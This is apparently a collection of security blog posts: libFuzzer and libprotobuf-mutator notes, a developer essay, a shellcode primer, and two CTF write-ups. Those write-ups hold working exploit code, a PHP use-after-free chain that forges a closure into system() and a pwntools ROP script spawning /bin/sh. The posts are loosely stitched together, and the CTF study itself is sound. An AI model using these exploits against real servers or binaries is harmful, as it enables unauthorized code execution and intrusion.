libprotobuf&libfuzz Part 2.

 We just dissect the source code from this guy's repo:https://github.com/bruce30262/libprotobuf-mutator_fuzzing_learning

we will use same .proto file to generate the messages

there are two main source code for our interess: 

• lpm_libfuzz.cc: Convert protobuf to raw data and feed it to the target function 
• harness.cc: Our target function

0x1.LPM_LIBFUZZER.CC

    

    0x1/0x1.ProtoToData analysis

        It creates a stringstream(a string in ourcase,a lie it creates a hashmap as a string) than he contatenates it resuting in :

    a: 33554433

    b: ""

        After that he just checks if checks to see if PROTO_FUZZER_DUMP_PATH is set so we can save crash files.

    

0x2.Harnesser.cc:

    

    there is out fuzzed function.if the generated data starts with '\x01' it generates a trap signal,and stops the fuzzer

libprotobuf&libfuzz Part 1.

0x1.Introduction

Protocol Buffers   

    Is a protocol that serializes data structures.It was developed by Google, and it is a language-independent, platform-independent extensible mechanism for serializing structured data (e.g. XML), but smaller, faster, and simpler.You define how you want to construct the data ,and then you can easily write and read structured data in a variety of data streams in a variety of languages using the generated special source code.

    LibProtoBuff-mutator

    

        Libprotobuf-mutator is a library to randomly mutate protobuffers.It could be used toghether with guided fuzzing engines,such as libfuzzer.

0x2.Compilation

    The official README wrote very clearly hwo ti compile it and install it,first have to install clang,this directly with ubuntu apt or download their own compilation or directly download the bin file.

Here is a paste from the official compilation process of github page:

This compilation has a pitfall,the fact is not an error when compiling,is the last test is included in the compilation, so it should not affect the use,but this problem can also be solved

Two Tests actually failed in LibFuzzerExampleTest, according to issues:https://github.com/google/libprotobuf-mutator/issues/108, is to compile the test did not open ASAN, resulting in the test sample may not crash output, resulting in the test failed,so the compilation failed

adaugi imagine

So dende gives the solution

https://github.com/google/libprotobuf-mutator/compare/master...dende:master

0x3.Example using protobuf

Examples will be based on https://github.com/bruce30262/libprotobuf-mutator_fuzzing_learning

Let's dig in.

        0x3/0x1: Protobuf file analysis

            syntax = proto2.There are two versions of the protocol buffers language, namely proto2 and proto3. This specification is written using proto2.

            message: although not explicitly defined iiuc, seems to be the smallest unit of a message description. It is a named field. For example message TEXT { defines a message format called TEST.

              field rule, type, name, number: A field is a portion of a message.

                -field rule: specifies if the field under consideration is required, optional, or repeated. They mean just that.

                -field type: specifies the data type of the field e.g., number uint32,string etc.

                -field name: name of the field

                -field number: unique identifier for said field. It is a good practice to start numbering from 1 since smaller integers require lesser storage.

    0x4.Compile protoc

        mkdir genfiles

        protoc ./test.proto --cpp_out=./genfiles

This will create test.pb.cc and test.pb.h in the genfiles directory

Than we simply write a program to test protobuf

we simply instantiate a class  namely test which protobuf exposes for us some methods 

And we compile it and run it

PHP UAF

*First things first,I would like to mention the fact that this blog is based on this write-up,which is way better than mine(https://mem2019.github.io/jekyll/update/2020/05/04/Easy-PHP-UAF.html)

*The only difference is the fact that we only dive & dissect the exploit 'n the patch.

0x00 Overview

The challenge is to exploit a PHP script engine using php7-backtrace-bypass. We can execute arbitrary PHP code but we must bypass disabled_function restriction to execute shell command, using a UAF vulnerability.However, different from official PHP engine, a custom libphp7.so is provided. This engine does not provide any loop functionality such as for/while/do-while/foreach. Moreover, in remote server, the recursion depth is also restricted, and strlen function always returns NULL, even though these cases do not occur in my local environment.

The exploit idea is similar to the exploit provided in Github: use UAF to overlap a string with an object, so that we can leak the addresses, then clone a function object and rewrite relevant function pointer to make the function system.

Bug overview

Our vulnerability lies php's function backtrace.The root cause for our challenge is a UAF(use-after-free bug) vulnerability.The use-after-free is caused by freeing variables without reference(e.i. ref count = 0) before putting the local variables into the backtrace.In this way already freed variables can be re-accessed by accessing backtrace.

0x02 Patch Review

Now in order for us to get a better understanding let's review the patch

Upon inspecting the patch they did this:

Unlink the current stack frame before freeing CVs or extra args. This means it will no longer show up in back traces that are generated during CV destruction.

We already did this prior to destructing the object/closure, presumably for the same reason.            

Now from their saying we can understand the fact the the bug was cause by the fact that they didn't free the current stack frame ,but rather they left it there and than terminate whatever  was there.Ok so we can see from the patch that they used unlink to do that.

Exploit overview

The challenge was origininal from De1ctf2020,the authors provided the poc from the bug hunter.Let's inspect that.The PoC is presented below

class Vuln {

    public $a;

    public function __destruct() {

        global $backtrace;

        unset($this->a);

        $backtrace = (new Exception)->getTrace(); // backtrace has ref to $arg

    }

}

function trigger_uaf($arg) {

    $arg = str_shuffle(str_repeat('A', 79)); // string to be UAFed

    $vuln = new Vuln();

    $vuln->a = $arg;

}

trigger_uaf('x');

$backtrace[0]['args'][1] // access UAF string

Upon inspection of the source code we can see that the author of the exploit createa a function called a,after that he released the memory zone of a, and saved a backtrace(a log of freed memory zone of variable a).

More in-depth exploit dev

Before exploiting any sort of engine we need to have problem domain based knowledge(how the engine deals with it's representation for it's data types,memory management and so on).

in php's case,we know how string and other php objects are stored in memory.Now the best was to exploit uaf

for our scenario is to free memory of string ,and replace is with a PHP Object have some sort of type confusion primitive.

One might be curious why do such a thing.In doing so,we can achive a memory leak primitive by reading the PHP string

Here is the definition of these 2 types:

struct _zend_string {

zend_refcounted_h gc;

zend_ulong        h;                /* hash value */

size_t            len;

char              val[1];

};

struct _zend_object {

zend_refcounted_h gc;

uint32_t          handle; // TODO: may be removed ???

zend_class_entry *ce;

const zend_object_handlers *handlers;

HashTable        *properties;

zval              properties_table[1]; 

    // zval is a union followed by its type description

    // for example: string is _zend_string* pointer and 0x6

};

Now doing the type confusion vulnerability this is what objects we get to overlap

string      object

gc          gc

h           handle

len         ce

val+0       handlers

val+8       properties

val+16      first field

val+24      type of first field

Therefore, we can leak pointer of object by reading content in +0x10 offset. In addition, pointer handlers points to somewhere at libphp7.so so that we can also leak base address of libphp7.

Here is the source code which is pretty self explaniatory.Something i would like to add is the fact the $helper is leaked for later for RCE

$helper = new Helper;

$helper->a = $helper;

$helper->b = function($x) {};

$helper->c = 0x1337;

$closure_handlers = str2ptr($abc, 0);

$php_heap = str2ptr($abc, 0x10);

// leaker address of $helper, which is also that of $abc

$helper->a = "helper"; 

// if we still have circular reference, 

// a strage crash will occur when rewriting string,

// so we remove circular reference here

$abc_addr = $php_heap + 0x18;

$libphp_addr = str2ptr($abc, 0) - 0xd73ec0;

$zif_system = $libphp_addr + 0x355a86;

// leak libphp and thus zif_system function

$helper->b = function($x){};

$closure_obj = str2ptr($abc, 0x20);

// leak a pointer pointing to a user-defined function object

RCE

The primary objective is to rewrite the function in b field to PHP system function.However, we cannot use strlen function to achieve arbitrary memory read, unlike the provided exploit.The aproach used by the author was to interpret address $closure_obj as a PHP string so that we can read contents after +0x18 offset.Source code provided below for the exploit.

// fake value
write($abc, 0x10, $closure_obj);
write($abc, 0x18, 0x6); 
// fake a string object at $closure_obj

function copyFunc($off)
{
	global $helper;
	global $abc;
	if ($off > 0x110) return;
	write($abc, 0xd0 + 0x18 + $off, str2ptr($helper->a, $off));
	write($abc, 0xd0 + 0x20 + $off, str2ptr($helper->a, $off+8));
	write($abc, 0xd0 + 0x28 + $off, str2ptr($helper->a, $off+0x10));
	write($abc, 0xd0 + 0x30 + $off, str2ptr($helper->a, $off+0x18));
	write($abc, 0xd0 + 0x38 + $off, str2ptr($helper->a, $off+0x20));
	write($abc, 0xd0 + 0x40 + $off, str2ptr($helper->a, $off+0x28));
	write($abc, 0xd0 + 0x48 + $off, str2ptr($helper->a, $off+0x30));
	write($abc, 0xd0 + 0x50 + $off, str2ptr($helper->a, $off+0x38));
	write($abc, 0xd0 + 0x58 + $off, str2ptr($helper->a, $off+0x40));
	write($abc, 0xd0 + 0x60 + $off, str2ptr($helper->a, $off+0x48));
	write($abc, 0xd0 + 0x68 + $off, str2ptr($helper->a, $off+0x50));
	write($abc, 0xd0 + 0x70 + $off, str2ptr($helper->a, $off+0x58));
	write($abc, 0xd0 + 0x78 + $off, str2ptr($helper->a, $off+0x60));
	write($abc, 0xd0 + 0x80 + $off, str2ptr($helper->a, $off+0x68));
	write($abc, 0xd0 + 0x88 + $off, str2ptr($helper->a, $off+0x70));
	write($abc, 0xd0 + 0x90 + $off, str2ptr($helper->a, $off+0x78));
	write($abc, 0xd0 + 0x98 + $off, str2ptr($helper->a, $off+0x80));
	write($abc, 0xd0 + 0xa0 + $off, str2ptr($helper->a, $off+0x88));
	copyFunc($off + 0x90);
} // function to copy the content inside $closure_obj

write($abc, 0xd0, 0x0000031800000002);
write($abc, 0xd0 + 8, 0x0000000000000003);
// write some headers in $closure_obj, 
// which are simply constants from gdb
copyFunc(0); // copy body in $closure_obj

write($abc, 0xd0 + 0x38, 0x0210000000000001);
write($abc, 0xd0 + 0x68, $zif_system);
// rewrite critical fields to make the function `system`
write($abc, 0x20, $abc_addr + 0xd0);
// rewrite pointer of field b to newly faked function object

($helper->b)($cmd);
die("end");

End.

END of The Game 

ESSAY ON WHY DEVELOPERS SHOULD START HACKING

     In the previous years,we have seen a continuous growing of cyber breaches and attack.Most of them arose due to some coding mistake,either from the developers team not knowing that their code is vulnerable or from a human mistake due to the fact that coders maybe have been tired or not paying attention while coding.

    In order to prevent this from happening and facilitate data breaches or ransomware attacks,I think developers should start to have some contact with the hacking culture and secure coding.          

    One first step which i think is necessary before the developers take contact with hacking is secure coding. But what is secure coding? 

    Secure coding in my opinion is an art,a way of living,but wikipedia defines it as: "Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Detects, bugs and logic flaws that are considerently the primary cause of commonly exploited software vulnerabilities."(Wikipedia,https://en.wikipedia.org/wiki/Secure_coding).

    In my opinion and not only mine,as it has been proven many times, is the core of hacking.Every hacker needs to know it in order to find different vulnerabilities.Why a developer wouldn't know how to use such a useful tool in order to find bugs such as Use-after-free,the notorious buffer overflow or oob(out-of-bounds)as is it know in the industry , integer overflow/underflow,double frees and so on.Now the process by which a developers makes first stepts into secure coding is by using a procedure knows as static code analysis.The procedure is very simple,the developer uses some tools,such as clang address-sanitizer,underfined sanitezer and so on in order to find wrong pieces of code which are left vulnerable.Of course,the developer could also try to do this process manually in terms of he could go and read and try to find it by himself,which is more effective cause a lot of times the sanitizers could show false positives.

    After a developer has mastered this tool,it's time for him to make contact to hacking.Hacking is the art of making a machine to do what you want to do.But wikipedia defines it as:

    "An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized)".

    What hacking actually is, bares the name of binary exploitation.A subset of hacking culture which aim's to find vulnerable snippets of C code,take advantage of the vulnerability and modify the memory control flow to do what the exploiter wants,which could be have a remote connection,print something on victim's screen or steal it's credit card.

    I have mentioned the term binary exploitaion earlier,and I define it better.Binary exploitation is the next logic step after learning static code analysis.It's the final stage where one shows his skills of understanding computer architecture,software architecture and ingeniousity in proving that the vulnerable piece of code is actually vulnerable and not just a false positive.

    With the presented facts above, I hope I have justified why a developer would improve more if he makes contact with hacking culture.  

Its_just_a_b4by_c4ll_0riented_Pr0gramm1ng_in_3xit

This is the first post from a long series on vulnerability research and techniques for exploit dev

out target todat:3x17 from pwntable.tw

ahamahamaham this blog is based  on v1cky's blog(https://v1ckydxp.github.io/2019/04/26/pwnable-tw-3x17-writeup/)

Now withdouth further a do,ladies and gentalmen let's get started

First things this 

Binary information gathering

One of the first things when investigating a CTF task and more even if it's a pwn one,we need to check for some mitigations.This can be achived by using checksec util.

Upon runnning checksec we get back that the binary is stack protected(NX bit set) and the fact that ther are no other mitigations. NX bit will not be a problem,cause we can bypass it using ROP(return oriented programming)

Reverse Engineering the binary

Upon inspecting main function we see there is no vulnerability,just a "feature" we can write any address anything we want.So we have a write-what-where primitive.But now how can we get RCE?

RCE

Now this is similar to some challenge from hitcon.The author of this challenged wanted this challenge to be solved in a specific way.Now the way we are supposed to solve this challenge is by overwriting  call.fini.array array. call.fini.array array is an array  which holds the function executed after the execution of the program ends.Now if we can overwrite it when the binary finishes normal execution,we can get RCE.One more thing to note is that.fini.array the functions saved in the array are executed in reverse order, first first.fini.array[1] and then execute fini.array[0].We can change value of array[1] to the address of the main function than the.fini.array[0] to 0x402960,so that after the execution of main execution ends to  continue to execute the function that calls the main function(0x402960).This allows the formation of a loop has been arbitrary address overwrite.From there we just crash a /bin/sh ROP chain.

here is the exploit:

# -*- coding: utf-8 -*-

from pwn import *

#p = remote('chall.pwnable.tw',10105)

p = process('./3x17')

def send_data(addr,data):

p.recvuntil('addr:')

p.sendline(str(addr))

p.recvuntil('data:')

p.send(data)

def pwn():

fini_array_addr = 0x00000000004B40F0

main_addr = 0x0000000000401B6D

loop_func_addr = 0x0000000000402960

main_leave_ret_addr = 0x0000000000401C4B

#change .fini.array[1] = main_addr,.fini.array[0] = loop_func_addr

send_data(fini_array_addr,p64(loop_func_addr)+p64(main_addr))

print 'change .fini.array'

#rop

pop_eax_addr = 0x000000000041e4af

pop_edi_addr = 0x0000000000401696

pop_esi_addr = 0x0000000000406c30

pop_edx_addr = 0x0000000000446e35

syscall_addr = 0x0000000000471db5

binsh_addr = 0x00000000004B4080

start_addr = 0x00000000004B4100

sys_read_addr = 0x0000000000446E2C

send_data(start_addr,p64(pop_eax_addr)+p64(0x3b))

send_data(start_addr+16,p64(pop_edi_addr)+p64(binsh_addr))

send_data(binsh_addr,"/bin/sh\x00")

send_data(start_addr+32,p64(pop_esi_addr)+p64(0))

send_data(start_addr+48,p64(pop_edx_addr)+p64(0))

send_data(start_addr+64,p64(syscall_addr))

send_data(fini_array_addr,p64(main_leave_ret_addr)) #this is required to overwrite first entry in the array to break

#from infinit loop to ret to fini array ->/bin/sh

p.interactive()

pwn()

Fuzzing with libafl

 Introduction to libFuzzer

libFuzzer is part of the LLVM package.It allows you to integrate the coverage-guided fuzzer logic into your C/C++ application.One of the best feature of libFuzzer is that it works close with Sanitizer Coverage and bug detecting sanitizers as ASAN,LSAN,MSAN,TSAN,UBSAN.As a consequence of using libFuzzer we can cover a wide range of memory corruption bugs and undesired application behavior such as: Heap/Stack/Global OOB,UAF,MEM LEAKS,Unintialized Mutex use.

Why would one use libFuzzer?

First of all,AFL-Fuzzer is incapable of handling different types of coverage such as tracking the evaluation of comparision instructions aslo AFL was unware of tracking the evaluation of standard functions that return certain values depending on the input,such as strcmp.

Now how does one actually use libFuzzer ?

Here is the canonic example showed on llvm fuzzer page:

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data,size_t Size)

{

    DoSomethingWithMyAPI(Data,Size);

    return 0;

}

There are two args to LLVMFuzzerTestOneInput,data & size.Data is a buffer of fixed len that is processed by our fuzzer and proccessed by our API. 

That said,libFuzzer is tailored towards:

    Fuzzing libraries and their APIs,rather than standalone programs.

    The behavior should be as deterministic as possible.The same input must result in the same output

    The called library should aboit exiting(by exit() or raising signals) for valid code path.

    It should avoid mutating the global state as otherwise it will confuse the fuzzer

    It may use threads, but all newly spawned threads should be joined before returning to libFuzzer

    Collecting diverse sources of coverage as productive as possible

Lets see a real world example from LLVM libFuzzer:

#include <cstdint>

#include <cstdio>

#include <cstdlib>

#include <cstring>

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

  if (Size >= 7) {

    char Copy[7];

    memcpy(Copy, Data, 6);

    Copy[6] = 0;

    if (!strcmp(Copy, "qwerty")) {

      fprintf(stderr, "BINGO\n");

      exit(1);

    }

  }

  return 0;

}

There are two ways to trigger the bug:

size of input larget or equal to 7 bytes(oob)

first 6 bytes are "qwerty" followed by \0 

Now we compile it by using this command

clang++ -fsanitizer=fuzzer,address name_of_source_code 

now we run it 

./output_name -runs=iteration_of_fuzz_testcase

We got a crash yey!

Now to inspect the crash

End

That's a wrapper up

CyberMisc 101:sHELL Code 101

Another blogpost another great day in out hacker village.

Today we will learn about shellcode.Lets get started

What is shellcode?

Wikipedia comes again to help us: "In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient.^[1] However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code."

Now in a TL;DR version it's baisically the payload which is dropper when and exploit executed.

Now how does one gets to write shellcode ?

Well it's quite simple,back in the early days of computers every computer scientist did it;TL;DR will we resume to using assmbly language?Waaaatt!!! Assembly are you out of your mind?Yes as eveil it may sound it's not actually that hard.

Assembly 101

Now to make it simpler for you i will outline the process of the c compiler

source code -> compiler -> assembler -> linker -> binary object

Now you see the compiler,one of it's function is to generate assembly language.So let's see what is one of it's function

imagine that in our source code we have the following instruction:

int a = 13;

Now let me explain the process and the behind the scenes action: this means the the computer has to go to a memory page,and choose an address in which will store a variable naned a,of type int(a whole number) which stores at it's address value 13.SImple right?Now imagine that in assembly we will write exactly what we have said.

in assembly what we have written upper is like this

mov, $register,value

mov - is an instruction which says to the CPU to move(put) a value into a register(CPU) variable a value

$register - a CPU variable